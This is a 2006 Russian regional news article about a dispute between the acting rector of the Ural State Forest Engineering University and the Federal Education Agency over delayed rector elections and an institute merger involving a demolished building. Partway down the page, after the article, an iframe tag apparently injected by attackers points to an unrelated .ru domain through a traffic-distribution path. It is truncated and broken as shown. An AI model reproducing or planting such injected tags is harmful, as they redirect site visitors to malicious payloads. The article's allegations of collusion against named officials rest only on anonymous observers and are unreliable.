06.10.2006, 16:10

Отношения УГЛТУ с Федеральным агентством по образованию могут быть испорчены окончательно

Политсовет, 06.10.2006. На протяжении последних недель стремительно портятся отношения между исполняющим обязанности ректора Уральского государственного лесотехнического университета Василием Азаренком и Федеральным агентством по образованию. В качестве причины наблюдатели называют «двойную игру» и.о. ректора УГЛТУ. Дело в том, что Василий Азаренок не спешит выполнять распоряжения федерального центра о выборах, пытаясь действовать в собственных интересах.
Напомним, что результаты первых выборов, прошедших 6 июня, были признаны несостоявшимися под достаточно спорным предлогом. Ситуация, которая стала складываться вокруг Лестеха, привлекла внимание общественности. В то же время чиновники федерального агентства обещали решить проблему с выборами ректора до конца года. Об этом, в частности, заявил начальник административного управления агентства по образованию Николай Аристер в ходе своего визита на Урал.
Первоначально выборы были назначены на сентябрь, потом, под давлением Азаренка, перенесены на декабрь этого года. Однако сейчас Василий Азаренок продолжает игнорировать однозначные указания московских чиновников, затягивая процесс подготовки к выборам. По мнению наблюдателей, Азаренок одновременно пытается инициировать внесение изменений в Устав вуза, с этой целью осуществляются попытки сменить состав Ученого совета университета.
Наблюдатели не исключают, что, вопреки первоначальным договоренностям с Москвой, Василий Азаренок может отказаться от роли «временного ректора» и попытаться установить контроль над вузом либо путем продления своих полномочий (для этого отодвигается дата выборов), либо через избрание ректором (с этой целью пытается поменять Устав и Ученый совет).
В случае, если Азаренку удастся сорвать выборы, коллектив университета может предпринять попытку опротестовать в суде отмену результатов первых выборов. Наблюдатели склонны полагать, что есть юридическая перспектива признания выборов легитимными, тем более что итоги выборов в свое время поддержал губернатор Эдуард Россель и председатель правительства Алексей Воробьев. В этом случае скандала федерального масштаба не избежать.
Существует вторая проблема во взаимоотношениях Василия Азаренка с Москвой. Сейчас он пытается найти выход из патовой ситуации с присоединением к УГЛТУ Уральского института подготовки и повышения квалификации кадров лесного комплекса. Согласно решению Федерального агентства, процесс объединения должен был завершиться еще до 1 августа 2006 года. Но при передаче собственности института была выявлена серьезная «недостача». Ректор института Евгений Дорожкин в 2002 году дал добро на снос одного из лабораторных корпусов, по адресу: ул. Ботаническя, 19г, на месте которого потом возникла элитная многоэтажка.
Понятно, что Евгений Дорожкин заинтересован в сокрытии факта пропажи учебного корпуса, и, по имеющимся данным, между ним и Василием Азаренком могут существовать на этот счет определенные договоренности. В кулуарном решении вопроса заинтересованы и высокопоставленные чиновники Федерального агентства по образованию, в свое время подписавшие разрешение на снос здания. По одной из версий, Азаренок вообще был назначен на должность и.о. ректора именно для осуществления приемки института с сокрытием факта пропажи здания на Ботанической.
Однако, согласно информации из источников, близких к процессу объединения, сейчас Василий Азаренок делает все возможное для того, чтобы не брать на себя ответственность за принятие учебного заведения в «неполном» виде. По информации источников внутри вуза, Азаренок уже предпринимал попытку распределить ответственность между всеми членами Ученого совета, предлагая им принять решение об объединении «коллегиально». Сотрудники вуза, по понятным соображениям, стремятся уклониться от этой чести.
Наблюдатели полагают, что такое противостояние со стороны Василия Азаренка может привести к тому, что Федеральное агентство по образованию может принять решение о смене и.о. ректора.
<iframe src="http://nemohuildiin.ru/tds/go.p

Похожие новости по теме
09.10.2006, 16:10

Евгений Дорожкин пытается сохранить контроль над имущественным комплексом Уральского института подготовки и повышения квалификации кадров лесного комплекса

Политсовет, 09.10.2006. Объединение УГЛТУ и Уральского института подготовки и повышения квалификации кадров лесного комплекса находится под угрозой срыва. Главной причиной является то, что ректор...

04.10.2006, 17:31

Василий Азаренок может сорвать выборы ректора УГЛТУ

Политсовет, 04.10.2006. Назначенные на 22 декабря выборы ректора Уральского государственного лесотехнического университета могут быть сорваны. Как полагают наблюдатели, кампанию, направленную на...

28.09.2006, 12:29

Василий Азаренок срывает выборы ректора УГЛТУ

Политсовет, 28.09.2006. В Уральском государственном лесотехническом университете фактически идет кампания по срыву выборов ректора. По мнению наблюдателей в самом вузе, за ней стоит исполняющий...

14.09.2006, 09:43

Конфликт вокруг лабораторного корпуса Уральского института подготовки и повышения квалификации кадров лесного комплекса — Азаренок «в деле»

Политсовет, 14.09.2006. Продолжает разгораться конфликт вокруг лабораторного корпуса Уральского института подготовки и повышения квалификации кадров лесного комплекса, который «исчез» в 2002 году....

18.08.2006, 15:46

Один из возможных сценариев рейдерской атаки на УГЛТУ

Как стало известно, организаторы и исполнители рейдерской атаки на Уральский государственный лесотехнический университет, разработали другой сценарий установления контроля над этим ВУЗом. Как...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам